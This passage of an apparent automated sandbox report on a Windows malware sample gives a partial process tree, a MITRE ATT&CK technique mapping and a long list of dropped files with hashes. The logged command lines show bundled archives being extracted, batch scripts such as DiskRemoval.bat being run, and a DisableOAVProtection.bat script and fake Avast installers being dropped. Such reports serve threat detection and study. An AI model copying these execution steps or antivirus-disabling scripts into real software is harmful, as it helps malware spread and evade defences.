                                                                                                                                                      7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:776
                                                                                                                                                    • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                      "SgrmClientApi.exe"
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:5032
                                                                                                                                                      • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                        "SgrmClientApi.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4856
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 488
                                                                                                                                                          9⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:3728
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\DiskRemoval.bat" "
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2344
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /T 60 /NOBREAK
                                                                                                                                                        7⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:544
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1632 -ip 1632
                                                                                                                                            1⤵
                                                                                                                                              PID:4396
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4856 -ip 4856
                                                                                                                                              1⤵
                                                                                                                                                PID:4304

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                              Persistence

                                                                                                                                              Modify Existing Service

                                                                                                                                              2
                                                                                                                                              T1031

                                                                                                                                              Bootkit

                                                                                                                                              1
                                                                                                                                              T1067

                                                                                                                                              Defense Evasion

                                                                                                                                              Modify Registry

                                                                                                                                              2
                                                                                                                                              T1112

                                                                                                                                              Disabling Security Tools

                                                                                                                                              1
                                                                                                                                              T1089

                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                              1
                                                                                                                                              T1497

                                                                                                                                              Discovery

                                                                                                                                              Query Registry

                                                                                                                                              4
                                                                                                                                              T1012

                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                              1
                                                                                                                                              T1497

                                                                                                                                              System Information Discovery

                                                                                                                                              5
                                                                                                                                              T1082

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                                MD5

                                                                                                                                                97a2db945a42346cdae06304a03250a8

                                                                                                                                                SHA1

                                                                                                                                                2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                                SHA256

                                                                                                                                                1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                                SHA512

                                                                                                                                                3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                              • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                                MD5

                                                                                                                                                97a2db945a42346cdae06304a03250a8

                                                                                                                                                SHA1

                                                                                                                                                2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                                SHA256

                                                                                                                                                1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                                SHA512

                                                                                                                                                3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                              • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                                MD5

                                                                                                                                                6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                                SHA1

                                                                                                                                                e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                                SHA256

                                                                                                                                                4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                                SHA512

                                                                                                                                                e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                              • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                                MD5

                                                                                                                                                6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                                SHA1

                                                                                                                                                e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                                SHA256

                                                                                                                                                4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                                SHA512

                                                                                                                                                e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\44xUGQ\DisableOAVProtection.bat
                                                                                                                                                MD5

                                                                                                                                                c97c64f53865b9da2a642d36b02df043

                                                                                                                                                SHA1

                                                                                                                                                181ca1deb68409feae2e70ebf347b3111218a47a

                                                                                                                                                SHA256

                                                                                                                                                1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                                                                                                SHA512

                                                                                                                                                05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                                                                                              • C:\ProgramData\44xUGQ\DiskRemoval.bat
                                                                                                                                                MD5

                                                                                                                                                0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                                SHA1

                                                                                                                                                85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                                SHA256

                                                                                                                                                1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                                SHA512

                                                                                                                                                137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                              • C:\ProgramData\44xUGQ\MMF.vbs
                                                                                                                                                MD5

                                                                                                                                                fa6dcfa398aff28ba12687272732eb51

                                                                                                                                                SHA1

                                                                                                                                                f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                                                                                                SHA256

                                                                                                                                                f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                                                                                                SHA512

                                                                                                                                                9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                                                                                              • C:\ProgramData\44xUGQ\extracted\file_10.zip
                                                                                                                                                MD5

                                                                                                                                                c9621d7aeec97d82dbd4adcf9cb9f2a0

                                                                                                                                                SHA1

                                                                                                                                                08f98568356f1e8b87df6e5ce36b5f9321a95770

                                                                                                                                                SHA256

                                                                                                                                                a8eb43eb99f7bee2d2a604b3607bb2cdbf75d91e9def8e2abf1fae64888405b8

                                                                                                                                                SHA512

                                                                                                                                                13101ccec6003c71eba95ec5e0cef0047c6172e0abeeaee63239bb8f4d1512735ea660570c3342908b0a8d95bb895900f024a80c07bfef79e12092724cc0600b

                                                                                                                                              • C:\ProgramData\44xUGQ\extracted\file_8.zip
                                                                                                                                                MD5

                                                                                                                                                134f19e66fa1fa01428497383608233a

                                                                                                                                                SHA1

                                                                                                                                                45597296b80d63bbe6e81d1897dde6dc2dd2a67e

                                                                                                                                                SHA256

                                                                                                                                                dfa3d77cddde79cb7edb58ef8a6bfd3fa5c44b24d80ccbf951a3e72fa220f25d

                                                                                                                                                SHA512

                                                                                                                                                53e51b70664b0d512c2962d9c02873a42298312707bc9bfc6771dd3b7103c0fb5045983d3094b9d876a049534383fc45de9973b4f515abdc935c029682789949

                                                                                                                                              • C:\ProgramData\44xUGQ\extracted\file_9.zip
                                                                                                                                                MD5

                                                                                                                                                6668a5dc7e2c1eee0faa3b68efe5bce1

                                                                                                                                                SHA1

                                                                                                                                                1c111148d207bcc057e1e6644baf7b03fb4a8511

                                                                                                                                                SHA256

                                                                                                                                                004e649c2824f5e6e443e5fd9c576b8d010019f5d2b8eff7b770f3b77553ecc8

                                                                                                                                                SHA512

                                                                                                                                                31e078c95eae1cba13479667316bb3577211a996edb5a791269c2164a8ec60064147fa560f89051956a89749e18dc9d070cff3e92d484616cbe0331f347d27ea

                                                                                                                                              • C:\ProgramData\44xUGQ\file.bin
                                                                                                                                                MD5

                                                                                                                                                2f58c923ea1cc3fd520932811682c408

                                                                                                                                                SHA1

                                                                                                                                                7414e6b91aa33f8a8b9dc28ac00520cefc43333e

                                                                                                                                                SHA256

                                                                                                                                                30a6276dc8d76a70152dc7b1b4c115055a4b27977ce8f43309b7625ddf0d362a

                                                                                                                                                SHA512

                                                                                                                                                874ea3c30fbeaea0872a2b518f0ae44226540177e19ddc6aa3b63e6f859b057c5d7a66d3a1d5085b94107f642d5aaf0c51e5e724540b69476018d205fa169baf

                                                                                                                                              • C:\ProgramData\44xUGQ\main.bat
                                                                                                                                                MD5

                                                                                                                                                1b7aeae05fee98007132f96fcde9206d

                                                                                                                                                SHA1

                                                                                                                                                c1e2b0b73b58d2f6b777db0adfc116477c7b1e45

                                                                                                                                                SHA256

                                                                                                                                                2478f9543b83d04e8ac7fceeb7ea7e62e4f2a69407ab7120b1e4f002e73d38ba

                                                                                                                                                SHA512

                                                                                                                                                071866ce1a7d20e0206b4b423ba19d7709da73a6829567c68be5bbb379ecfc5f8e129fd361da02945909f4ad848622add19ce3fc6761d8ee87acce6985f07903

                                                                                                                                              • C:\ProgramData\Avast Software\Icarus\Logs\icarus.log
                                                                                                                                                MD5

                                                                                                                                                1e049e37ebafd071f0fc318cecb6e0e7

                                                                                                                                                SHA1

                                                                                                                                                1acc3937874f00d32f7b223aead5cda9a943191b

                                                                                                                                                SHA256

                                                                                                                                                3387cd618ba463155629656cc9c1e4ebf6e620bdf8f96f9b4292879d0db3425b

                                                                                                                                                SHA512

                                                                                                                                                1524c340f0c0bf53a1afd9b335640e990129487b5f6a7ef9938d64094267d7db1a985ba154a749bf67ecdd341b8873fedb319bb0e0e8df3146f9bf734393aac7

                                                                                                                                              • C:\ProgramData\Avast Software\Icarus\settings\proxy.ini
                                                                                                                                                MD5

                                                                                                                                                d6de6577f75a4499fe64be2006979ae5

                                                                                                                                                SHA1

                                                                                                                                                0c83a2008fa28a97eb4b01d98aeab90a2e4c8e69

                                                                                                                                                SHA256

                                                                                                                                                87d882d37f63429088955a59b126f0d44fa728ce60142478004381a3604c9ea9

                                                                                                                                                SHA512

                                                                                                                                                cb4b42c07aa2da7857106c92bc6860a29d8a92f00e34f0df54f68c17945982bc01475c83b1a1079543404bb49342fc7cdc41d2ac32d71332439ceb27b5ad1c0c

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                                MD5

                                                                                                                                                72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                                SHA1

                                                                                                                                                1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                                SHA256

                                                                                                                                                34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                                SHA512

                                                                                                                                                583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                MD5

                                                                                                                                                619f7135621b50fd1900ff24aade1524

                                                                                                                                                SHA1

                                                                                                                                                6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                                SHA256

                                                                                                                                                344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                                SHA512

                                                                                                                                                2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                              • C:\ProgramData\xOUvu\DisableOAVProtection.bat
                                                                                                                                                MD5

                                                                                                                                                ed77c2b2866fc09850a317f2620f4f9c

                                                                                                                                                SHA1

                                                                                                                                                ed1d7485a1111bd553ffe81927260652718a1c39

                                                                                                                                                SHA256

                                                                                                                                                763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

                                                                                                                                                SHA512

                                                                                                                                                4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

                                                                                                                                              • C:\ProgramData\xOUvu\DiskRemoval.bat
                                                                                                                                                MD5

                                                                                                                                                0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                                SHA1

                                                                                                                                                85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                                SHA256

                                                                                                                                                1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                                SHA512

                                                                                                                                                137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                              • C:\ProgramData\xOUvu\MMF.vbs
                                                                                                                                                MD5

                                                                                                                                                62c210400fef1cb41efa4c8b2c963964

                                                                                                                                                SHA1

                                                                                                                                                fa471dcf721b5f61a8794a75e3a9226e79b3ec80

                                                                                                                                                SHA256

                                                                                                                                                ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

                                                                                                                                                SHA512

                                                                                                                                                64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

                                                                                                                                              • C:\ProgramData\xOUvu\extracted\file_10.zip
                                                                                                                                                MD5

                                                                                                                                                653254d9174e6a9e34515f920faaa4fa

                                                                                                                                                SHA1

                                                                                                                                                1655d6e910b8ea9547487548e9862e905d37687f

                                                                                                                                                SHA256

                                                                                                                                                162d7e27f22836781803301c9539a66381ceab682d18275422742009a057a6e6

                                                                                                                                                SHA512

                                                                                                                                                418f842d008c3c09b6df65f6bf90e777cf11286a1fda397bee1f24cc8f4140c36c95b279f61d253f7f0e967bd4dac38f096b842312eefdb3750cfef26610986c

                                                                                                                                              • C:\ProgramData\xOUvu\extracted\file_11.zip
                                                                                                                                                MD5

                                                                                                                                                6a7e461229c7336211c2a15b8cb08a98

                                                                                                                                                SHA1

                                                                                                                                                93c2a8e2397af9a1c5c2815220124b5826593d69

                                                                                                                                                SHA256

                                                                                                                                                8f554be2e689068002d244c93c6712fa522e463ebad2882eef7ee7062abc6568

                                                                                                                                                SHA512

                                                                                                                                                52be50bae32d8be39d2fe54b88093f17ade38d8e256c50a3940cf2c565b4e855960b3a56f36459382adc93e1614367a23d3dea5f027fcbbe5871c414a35cac9a

                                                                                                                                              • C:\ProgramData\xOUvu\extracted\file_9.zip
                                                                                                                                                MD5

                                                                                                                                                2b287fed259ccec9b10a6d9048784794

                                                                                                                                                SHA1

                                                                                                                                                6f4935e26ed3ff4b6b138be4d040457632de6bb8

                                                                                                                                                SHA256

                                                                                                                                                6d40b258ebbf62639d1254ac00d38dbf7df044c1ae8e7ce0a90f2dfcbdb6d102

                                                                                                                                                SHA512

                                                                                                                                                166782f9ee9d46053b66a8d648f91cef3bfb3c370c5d13244beefeb6485521088264425309a68ae557b718cfe771f6ac592df67f50a4dcdb220f5c68546b8d73

                                                                                                                                              • C:\ProgramData\xOUvu\file.bin
                                                                                                                                                MD5

                                                                                                                                                897c2da4873706af1dd7e95204b8f82c

                                                                                                                                                SHA1

                                                                                                                                                36ef68962c416f3f627d04fdd6a784c4e9b4df37

                                                                                                                                                SHA256

                                                                                                                                                575e2af2e82f7a31e6a2dd0968acbb30d190da22e7935fe718e725cc95843123

                                                                                                                                                SHA512

                                                                                                                                                ae74bb521ddfe33d12c58448daf8191fa05828bf72ae85b226ed99f6ca5c6418d8f87d10532b8bbee8686a3967eef53b1b8565b5278018f40ab273b91dc621ec

                                                                                                                                              • C:\ProgramData\xOUvu\main.bat
                                                                                                                                                MD5

                                                                                                                                                87d5210ddd66fe8843cd702ee78b1933

                                                                                                                                                SHA1

                                                                                                                                                f6faf81c8cae28f42ee7e120cf80cba42640e13e

                                                                                                                                                SHA256

                                                                                                                                                b41cfe7095479b54da9913d28fff26a0f5ec916aba826ccd8effb616d9d58a58

                                                                                                                                                SHA512

                                                                                                                                                5c2169c8487f60bfa10dc17d9fd93e2105ea1e7f0d1a22fd8207bd9dd814af6af934206cfe24f6f4ab77324468a9e63796588f52fd78246279c42347bd82f766

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-33MPS.tmp\_isetup\_iscrypt.dll
                                                                                                                                                MD5

                                                                                                                                                a69559718ab506675e907fe49deb71e9

                                                                                                                                                SHA1

                                                                                                                                                bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                                SHA256

                                                                                                                                                2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                                SHA512

